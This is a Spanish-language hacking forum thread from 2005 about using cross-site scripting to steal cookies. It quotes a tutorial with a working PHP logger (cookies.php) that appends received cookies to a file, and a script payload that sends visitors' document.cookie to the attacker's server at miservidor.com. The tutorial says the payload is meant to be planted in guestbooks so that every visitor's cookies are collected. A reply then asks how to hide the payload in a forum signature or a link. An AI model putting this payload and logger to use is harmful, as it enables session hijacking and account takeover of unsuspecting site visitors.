Hacking / Hacking Básico / Re: XSS en: 08 Noviembre 2005, 22:38
-------------------------------------
La mejor forma de emplear XSS
=====================
Luego de que verificaste que era Vulnerable
-Lo mejor es emplear scripts que funcionen como cliente servidor, por ejemplo:
--->Creas el fichero cookies.php con la siguiente información:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
--------------------Hasta aquí
Line 1 - Obtiene del post que vas a enviar sólo la cookie
Line 2 - Crea el archivo archivo.txt
Line 3 - Dentro de archivo.txt mete la cookie (modo agregar)
Line 4 - Cierra el fichero y se guarda todo
--->Luego subis el fichero cookies.php a un servidor donde tengas hosting, o sea accesible desde la web, (por FTP, ssh o via web u otros)
--->Bien Suponiendo que tu host sea:
http://www.miservidor.comquedaría
http://www.miservidor.com/cookies.php-----------------------------------------------------------------------
FIN DE CONFIG. DEL SCRIPT TIPO SERVER
-----------------------------------------------------------------------
INICIO DE SCRIPT TIPO CLIENTE
---> Este script sólo hará que se conecte a tu server (este es el que se postea en el libro de visitas o tag's, ya que si lo haces desde el buscador solo obtendras la cookie actual, y no todas.
code:
<script>window.location='
http://www.miservidor.com/cookies.php?cookie='+document.cookie;</script>
ahora recibiras las cookies en tu archivo.txt
---------
INICIO DE SCRIPT TIPO CLIENTE
---> Este script sólo hará que se conecte a tu server (este es
como se coloca este codigo en la firma de un foro?<script>window.location='
http://www.miservidor.com/cookies.php?cookie='+document.cookie;</script>
ahora recibiras las cookies en tu archivo.txt
alguien podria explicarme como podria añadir esto en un link(hipervinculo) para poder pillar las cookies de esa página?
seria de mucha ayuda, gracias por ayudar a los que estamos empezando a aprender como defendernos de estas cosas---------
Autor
En línea
